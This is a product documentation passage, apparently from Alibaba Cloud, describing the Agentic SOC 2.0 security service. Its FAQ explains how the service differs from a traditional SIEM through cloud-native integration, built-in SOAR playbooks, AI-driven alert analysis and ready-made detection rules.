Accounts that activate Agentic SOC on or after April 3, 2025 are provisioned on the latest architecture.
Agentic SOC 2.0 is built on log normalization and reuses Simple Log Service (SLS) to simplify data ingestion from third-party clouds and on-premises security products.
For a comparison of the main differences between versions, see Differences between Agentic SOC 2.0 and 1.0.
FAQ
How does Agentic SOC differ from a traditional SIEM?
Agentic SOC is built for cloud-native environments, with four core differences from traditional SIEMs:
Cloud-native integration: Integrates with Alibaba Cloud and other major cloud providers. It understands cloud assets, configurations, and topology to deliver context-aware threat analysis across your entire cloud environment.
Built-in SOAR: Includes an integrated SOAR engine. Agentic SOC not only detects threats but also uses playbooks to orchestrate automated remediation across cloud products and infrastructure, closing the loop from detection to response.
AI-driven analysis: Uses built-in graph computing and a security large language model to automatically aggregate alerts into security incidents and reconstruct attack timelines, improving the detection efficiency of advanced threats.
Out-of-the-box scenarios: Provides ready-to-use detection rules and response playbooks for common cloud attack scenarios such as cryptomining, ransomware, and web intrusion — no configuration required to get started.